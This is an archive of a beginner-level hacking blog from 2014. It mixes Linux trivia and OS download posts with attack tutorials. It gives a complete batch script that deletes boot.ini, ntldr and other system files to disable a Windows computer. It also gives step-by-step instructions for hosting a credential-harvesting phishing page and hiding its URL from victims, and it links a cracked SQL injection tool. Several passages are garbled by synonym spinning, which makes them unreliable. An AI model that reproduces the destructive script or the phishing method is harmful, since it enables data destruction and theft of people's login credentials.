
Wednesday, 31 December 2014

Features of LINUX (Download LINUX .iso)

Here is a short description about Linux operating system.....

Linux is one of the world’s most powerful and popular
operating system. Linux operating system was developed by
Linus Benedict Torvalds at the age of 21. At present there are
more than 300 flavors of Linux available and one can choose
between any of them depending on the kind of applications
they want. Linux is a freeware and generally speaking its free
from Virus and other malware infections.
Few Linux facts which may or may not be know for many of

14 Most Interesting Linux Facts

1.Only 2% of the current Linux kernel written by Linus
Torvalds. The Linux kernel version is written in the
programming language C.

2.The first commercial distribution GNU / Linux was Yggdrasil
was launched Lice-CD format in 1992. Red Hat was one of the
first distributions to settle within companies and data centers
in 1999.

3. A guy named William Della Croce Jr. registered the name
Linux and demanded royalties for use of the mark. Later, he
agreed to assign the trademark to the true owner, who is

4.Countries such as Russia, Brazil and Venezuela have put
their focus on Linux as a basis for interoperable
management , cost efficient and technologically independent.

5. U.S. Department of Defense, U.S. Navy Submarine Fleet,
Federal Aviation Administration uses Linux in government

6. 90% of the world’s most powerful supercomputers using
an operating system GNU / Linux, in fact, the top ten of
supercomputers use Linux. In fact, the penetration of Linux in
data centers is very high, 33.8% of the world runs on Linux
servers compared to 7.3% does so in a Microsoft operating

7.The name of the penguin, Tux , is not entirely clear. On the
one hand, it is said that the origin of the name comes from the
fact that penguins appear to be wearing a tuxedo, which in
English is said max tuxedo tux and is abbreviated. In contrast,
another source comes from the letters of the logo of Tux are
Unix Torvalds.

8.Torvalds wanted to call the kernel Freax (a combination of
“free”, “freak”, and the letter X to indicate that it is a Unix-
like), but his friend Ari Lemmke, who administered the FTP
server where the kernel was hosted for download, the
download directory called kernel of Linux Torvalds.

9.Debian was one of the first GNU / Linux that was
constituted and organized as a community of developers.

10.Linux is present in highly critical applications such as
Japan’s bullet trains, traffic control, San Francisco, the New
York Stock Exchange, CERN, many air traffic control systems
or control of
nuclear reactors of submarines and ships many nuclear war.

11.Linux programmers are often associated with living
“isolated” in the world, however, over 75% of the code
developed for the Linux kernel came from private sector
developers. In fact, large
technology companies like Intel, Google, IBM, AMD, Sun
Microsystems, Dell, Asus, HP, Analog Devices, Oracle, Novell
or Red Hat help developing applications, contributing to the
core or pre-installing any GNU / Linux their machines. In fact,
during the 2003 Super Bowl (which paralyzes the United
States and remains glued to the TV for many Americans), IBM
delivered a beautiful ad talking about Linux and open source

12.The GNU project in 1991, had no drivers and kernel, that’s
what led to Linus Torvalds to address the Linux kernel
development. If GNU had had, perhaps, Torvalds had not been
put to work on that.

13.The Linux kernel is now the most widely ported operating
system, running on a great variety of operating systems.

14.World known companies such as Google, Cisco, Facebook,
Twitter, Linked in etc use Linux as their main operating

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Recommended Hardware/Minimal System requirements:


View the the standard package list and more details here.
Check out our hardware database here.
How do I install Linux Lite? Click here.

Repository Mirrors

Linux Lite 2.2 Codename 'Beryl' 32bit - 1st December, 2014

737MB - DVD
LIVE USER:Login to the live desktop is automatic
BASE:Ubuntu 14.04.1 LTS

Linux Lite 2.2 Codename 'Beryl' 64bit - 1st December, 2014

738MB - DVD
LIVE USER:Login to the live desktop is automatic
BASE:Ubuntu 14.04.1 LTS


Tuesday, 30 December 2014

How to Hack a website by SQL Injection? Beginners Level

Exploit: SQL Injection Vulnerability in Drupal 7.x

Before reading this post you must have basic knowledg of PHP .
Safety and security scientists from SektionEins have actually uncovered a vital SQL Shot vulnerability in Drupal CMS that leaves a a great deal of web sites that utilizes Drupal in jeopardy.

Drupal presented a data source abstraction API in variation 7. The objective of this API is to avoid SQL Shot strikes by disinfecting SQL Queries.

This API itself presented a important as well as brand-new SQL Shot vulnerability. The vulnerability makes it possible for assaulters to run harmful SQL questions, PHP code on at risk internet sites. An effective exploitation enables cyberpunks to take total command of the website.

This vulnerability could be made use of by a non-authenticated individual and also has actually been identified as "Extremely Important" one.

You can also directly modify the "includes/" file to patch this vulnerability; Change the "foreach ($data as $i => $value) {" with "foreach (array_values($data) as $i => $value) {" in 739 line.

A proof of Concept has been released online that allows anyone to change the password of admin account. So, better Hurry UP! Update your Drupal CMS.

One of the reddit user "fyukyuk" posted a HTTP post request that exploits this vulnerability.

The following python Code changes the admin password of vulnerable Drupal to 'admin' (Tested with Drupal versions 7.21,7.31).

Download Havij Pro :-  Download Havij 1.17 Pro+Patch
Password:-               Asif

Monday, 29 December 2014

How to Kill a Computer by Command Prompt? For Beginners

How to Kill  a Computer by Command Prompt?

In this article, I will outline a few ways simple ways of removing important system files that will halt the functionality of a computer, using cmd. Though these commands may not always work if it has a file access restrictions on users.


Note: DO NOT run this script on your computer, it might potentially harm your computer.To safely test such viruses, you can try running it though sandboxie or any other Sandbox emulation software.

1. Open notepad or any text editor of your choice.

2. Paste the below code in a new file.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

3. Click on "Save As" select File Type as "All files" and save it as 'something.bat'.

4.Basically, we are creating a batch file that will run system commands.

What does this do?

@echo off - Prevent the line from being shown on the screen.
attrib -r -s -h - Configures file attributes read only,system, hidden.
del - Deletes a file from a location.
boot.ini - Contains boot configuration.
autoexec.bat - Loads programs and drivers on boot.

Sunday, 28 December 2014

How to Hide or Conceal URL? For Beginners

How to Hide or Conceal URL?

As a continuation of tutorials on Phishing, we show you in this tutorial how to conceal a URL.That is, with the following techniques you can make a suspicious URL look much more trust able. For example, a URL like can be made into a much cleaner and click able link as In this post, we shall explore all such possibilities with which you can deceive a user to click on a link of your choice.Though this technique can always be detected by a smart user, it is possible to get creative with these options by social engineering your victim.

URL Shortening

This method is probably the easiest. Let us assume you have a link like which you wish to hide. The easiest way is to convert into a URL like this, if you click on that link, it will automatically redirect you to and an attentive user will not notice the URL change!

So, here are a few good URL shortening services.

  • - customizable URL link
  • - google's official URL shortener, but not link customization
  • - customizable URL link but a very famous website, less likely to deceive a user.
For more services, visit : 

Custom Domain

Often, when big phishing scandals are going on worldwide where hackers acquire hundreds of thousands of login infos with the help of Phishing, it involves the use of an even more convincing link which can easily deceive, the users.

Paid Custom Domain - usually require you to pay for something like along with that, you need a hosting. If you're familiar with usage of custom domains, then is not a problem.

Free Custom Domain - you can also free custom domain using a website called . Therefore a URL like will be converted to

Hyperlink Masking

Many a times, you might want to include a link into an email or an webpage. In which case, you can simply use HTML tags in a smart way to misuguide the usre into what he is clicking.

For example, click on It goes to we made use of how a link is embedded in webpage.The code for such a link would be.

<a href=""></a>

iFrame Inclusion

In this technique we yet again use the help of HTML and include an iframe into a web page. For instance, go to this webpage that I created As you can see in that website, the URL of the website itself is different from the original domain Using this technique, you can include an iframe in any web page.

The code you need to use in the webpage is.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns="">
        <title>iFrame Inclusion Demo</title>
        <style type="text/css">
            body, html
                margin: 0; padding: 0; height: 100%; overflow: hidden;

                position:absolute; left: 0; right: 0; bottom: 0; top: 0px;
        <div id="content">
            <iframe width="100%" height="100%" frameborder="0" src="" />

NOTE: The problem with iframe is that, you CANNOT redirect this URL to another, in this case, redirecting to anything else is not possible, so If the user does realizes this at some of of time, he will become suspicious.

Enjoy..... :-P

How to Hack by Phishing Page? For Beginners

How to Hack by Phishing Page?

We will show you how to set up and tap User and Password details of a particular website. Assuming, you have read the previous tutorial on 'What is a Phishing?'  we will move on to how to set up such a page that is accessible by everyone by hosting it on a web server.


Go to :

Here is a phishing page that was set up for demonstration purposes that is a typical login form without the website design but when you enter your credentials and click on 'Submit' , it will inconspicuously redirect you to  /login.php and then And the passwords are automatically stored as a text file at:

In the following post, we will use this same technique just that, our website would look exactly like the original Facebook webpage but on a different URL as shown below.


In order to set up your own page and host it on a website, first off you will need to download the phishing page script below.

File Details:

File URL:
File Name: Facebook-Hackbook.rar
Size: 14KB
Type: .rar (compressed archive)

1.Register an account at a website that gives free webhosting such as
2. Go to the File Manager > Upload Files .Select all the files and upload.
3. Now go to your website that is of the form

4. This is the website that you have to send to your friends. This where the phishing page has been hosted. Any details entered here are stored at :

5. That's it folks! All you have to do now is improvise on this and conceal this URL using different techniques (the next article of this series!), you could use a bit of social engineering. It's all up to your creativity now!

Saturday, 27 December 2014


What is Phishing?

Phishing in its simple sense is a way of 'fishing' out a user's login details of a website. A phishing webpage looks very similar to a website but has other motives behind it. For example, this is a webpage that looks exactly like facebook, when you click on Sign In, it will redirect you to another webpage /login.php where it will quickly collect the Username and Password that you wrote and redirect you to the original Facebook website.

Most of the users wouldn't notice this in the URL, they would overlook it and mistake it for having entered the wrong credentials.When they enter it the next time, they would simply login without any hassle as they are now on the original website, without even realizing that the Password has been hacked!

Stored Data

How can I protect myself?

Usually phishing involves stealing personal data such as the ones below.

  • Usernames and passwords
  • Social Security numbers
  • Bank account numbers
  • PINs (Personal Identification Numbers)
  • Full credit card numbers
  • Your mother’s maiden name
  • Your birthday

There are several ways through which this attack is launched.

Emails - Mostly through emails with fake sender's info using the technique called Anonymous Mailing.For instance, with anonymous mailing, I could send a mail from right into your inbox and you would actually believe it to be true. It would look very legitimate and say something like this:

"Your Password has to be reset, please follow the link("Phishing Page") to confirm you're username and password."
Though such mails look very convincing, it is important to cross check the Sender's Mail, and report such a phishing immediately.

Courtsey :

Chats - Chatting online in chat rooms or on Facebook with strangers can potentially compromise your computer in a number of ways. Clicking on unsafe links such as 'check out my xxx pics' has been shown statistically to be used often against teenagers. Therefore, not opening links randomly without any proper understanding of the website can help you protect your account.

HTTPS - Always look for an HTTPS on the website, it ensure safe passage of information from your computer to the website. Especially with websites that involve credit card and bank information details.

Falsifying Details - You can always be extra sure by giving in fake login details and see how the webpage responds to it, if it quickly redirects you to another website then you could be sure that you dodged a phishing attack.



So check out whether you are getting tracked or not by a hacker.........

In this tutorial I'll be showing you ways to obtain a hacker's information, particularly his IP address.Once you have his IP address, you can trace it to the exact location through a number of IP Lookup tools such as this free one : you have been successful in identifying the malware file that a Hacker infected you with, then it saves most of the trouble and we can simply work on this file. I will be showing you have an unprotected hacker can give himself up to the feds by doing something stupid like this. I believe, this tutorial is a must for every hacker who does not maintain is anonymity.


First off, you will be needing these two softwares, Wireshark - Packet Analyzer and Sandboxie - Program isolation Software

1. Open Wireshark.

2. Click on Wireless Network Connection or Local Area Connection depending on whichever kind of network you are currently on. Then click Start.

3. For RATs usually the type of connection made is through DNS. For keyloggers , the connection is usually made through FTP or SMTP. Let us use a DNS connection for detecting a RAT in this example.By doing this, you will able to see all the DNS connections that are being made from your computer.

4. Now open Sandboxie. Any program that is opened via this tool, completely isolates the program from the rest of the computer, therefore, once you close sandboxie, then all the programs running through it will be terminated and your computer would not be affected in anyway.

5. Now we need the file that you suspect is the virus.Let us assume that you have a file named as notantivirus.jpg.png.exe as shown below. When you open through Sandboxie, the virus is trapped in it, but it can access all your saved data such as Saved Passwords on your browsers.Make sure you clear them.

6. Go back to wireshark, you will see a connection that is of the form

It can be of something else, where is replaced by some other Dynamic DNS service.

7. Once you get that address.Then you can simply ping that address via Command Prompt and get the IP address to which it is connected to!


Hackers often overlook the anonymity and get caught by the feds through very silly ways. There have been several such examples in the hacking world where top notch hackers were caught while trying to hack the best servers such as League of Legends in this case : It is therefore important to know this method to pin down such hackers and if you happen to be one, then it is a must to get anonymous through proxy servers or through other means.

Enjoy :-P

Friday, 26 December 2014

What and How to Port Scan? - Beginner's verison.

What and How to Port Scan? - Beginner's verison.

In this article I hope to impart basic amount of knowledge on port scanning.It is commonly used term while browsing through Hacking related articles. Though, you could always wiki for help. I believe this would be of more use.

Port Scanning

Port scanning is the procedure of hunting for energetic or opened up ports in sufferer system. Similar to a burglar looking for entrance opened up residence. Consider this scanning

A Sample Check ...

Target Host: or IP Address

TCP Port:7 (reflect).
TCP Port:9 (dispose of).
TCP Port:13 (daytime).
TCP Port:19 (chargen).
TCP Port:21 (ftp).
TCP Port:23 (telnet).
TCP Port:25 (smtp).
TCP Port:37 (time).
TCP Port:53 (domain name).
TCP Port:79 (finger).
TCP Port:80 (www).
TCP Port:110 (pop).
TCP Port:111 (sunrpc).

It reveals the energetic ports because domain name or ip address.

Usage of Port Scanning

We could acquire their information without their expertise.(The point is that you could burglary their information).

Checking for open ports is performed in 2 methods.

Check a solitary IP address for open ports:

It much like a burglar that looking for any kind of opened up entrance in solitary property.
In regard to scanning, eviction is port as well as residence is IP address.
We are looking for the energetic port in a solitary IP address.

hunting for energetic ports just at 123. xx.xx.xx.

Check an array of IP address to discover open ports:

Checking an array of IP address resembles burglar that hunting for any kind of opened up entrance in a road. In connection with scanning, eviction is ports as well as road is array of ip address.

looking energetic ports just at.
123.20. xx.xx to 123.30. xx.xx.

I hope this article helped you get an idea of the technique of port scanning.



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Wednesday, 24 December 2014

Windows 10 (Free Download Full Version Windows 10)

                                        WINDOWS 10




  I am going to discuss about Upgrade To Windows 10 (Free Download Full Version Windows 10) for free of cost. Recently, Microsoft has just announced that they have released an early Technical Preview of Windows 10.  I always loved the moment when new OS release comes from Microsoft Windows 10. Users were expecting Windows 9 after the previous 8.1 but it was quite surprising that Microsoft Skipped 9 and released Windows 10. In this latest version of microsoft windows 10 has new look of Metro Style UI (User Interface) and Microsoft had to take a new step to create a Mixture of Windows 7 and Windows 8 to create the latest Windows 10.

So far Windows 10 has received positive response from technical groups and it is not official released by Microsoft. However they have released a preview version. You can easily Download and Upgrade to Windows 10 for free of cost and get concept of how this product will work. I’m also excited to install this on your new system.
Features of Windows 10

There are some features that you’ll get after,

    New Cleaned Start Menu.
    Mix of Windows 8 & Windows 7 Metro style UI (User Interface).
    Virtual Desktops Feature.
    Task View Option.
    Dynamically Resizing of Windows Apps.
    Huge Search Improvements.

Windows 10 Specifications

    Windows 10 Technical Preview : English
    Setup File Name: WindowsTechnicalPreview-x86-EN-US.iso (32 Bit) / WindowsTechnicalPreview-x86-EN-US.iso (64 Bit)
    Full Setup Size: 2.9 GB (32 Bit) / 3.81 GB (64 Bit)
    Setup Type: Offline Installer / Full Standalone Setup:
    Compatibility Architecture: 32/64 Bit (x86)
    License: Free
    Developers: Microsoft

Minimum System Requirements for Windows 10

Make sure you system meets minimum system requirements are following :-

    Processor: 1 GHz
    Memory (RAM): 1 GB (For 32 Bit) / 2 GB (For 64 Bit)
    Space: 16 GB Free Hard Disk Space


Click on below button to start Windows 10 Download ISO 32/64 Bit Free of cost. This is Technical Preview released by Microsoft yet.  You can easily download and install it via USB or DVD

32 BIT

64 BIT

Installation code    NKJFK-GPHP7-G8C3J-P6JXR-HQRJR

Above is official Installation Code Provided by Microsoft here. You can also download your own Language ISO as well.

How to Make a Virus?


If you are doubting your antivirus and you want to know whether its working or not then you are at the right place,

 All you have to do is follow the steps written down the page:-

1 Step: Open note pad and copy 


as it is......

It will look like this.
 2 Step: Then save it with any name with the extension .bat but don't forget to change "Save as type" to all......

Then if your antivirus is enabled and its working your antivirus will show you a warning........

But dont worry its not a virus nor its harmful to your computer or your data its just simple coding to test antivirus software you are using. Now you will be knowing whether your data is secured with your antivirus or its time to buy a new antivirus suite........





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